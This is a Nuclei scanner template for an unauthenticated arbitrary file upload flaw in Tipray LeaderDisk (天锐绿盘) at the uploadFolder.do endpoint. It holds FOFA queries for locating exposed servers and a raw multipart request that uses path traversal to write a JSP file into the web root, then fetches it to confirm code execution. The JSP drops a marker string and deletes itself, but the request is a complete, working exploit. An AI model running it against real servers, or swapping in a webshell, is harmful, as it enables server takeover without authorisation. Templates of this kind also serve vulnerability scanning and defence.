id: tianruilvdun-uploadFolder_do-File-upload

info:
  name: 天锐绿盘云文档安全管理 uploadFolder.do 任意文件上传漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: body="/lddsm/" || title="天锐绿盘" || title=="Tipray LeaderDisk" || body="location.href=location.href+\"lddsm\""
    天锐绿盘云文档安全管理 uploadFolder.do 接口存在任意文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
  reference:
    - https://mp.weixin.qq.com/s/ZyHcFo43xzaqIprG75msPQ
  tags: File upload

variables:
  username: "{{to_lower(rand_base(6))}}" #从可选字符集（默认为字母和数字）生成给定长度字符串的随机序列

http:
  - raw:
      - |
        POST /lddsm/service/../admin/activiti/uploadFolder.do?taskId=../webapps/ROOT/&relativepath=1&path=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXqK9dR2yTv7wNpLm

        ------WebKitFormBoundaryXqK9dR2yTv7wNpLm
        Content-Disposition: form-data; name="file"; filename="{{username}}.jsp"
        Content-Type: image/png

        <% out.println("pboyjnnrfipmplsukdeczudsefxmywe"); new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
        ------WebKitFormBoundaryXqK9dR2yTv7wNpLm--
  - raw:
      - |
        GET /{{username}}.jsp HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'pboyjnnrfipmplsukdeczudsefxmywe'
      - type: status
        status: 
          - 200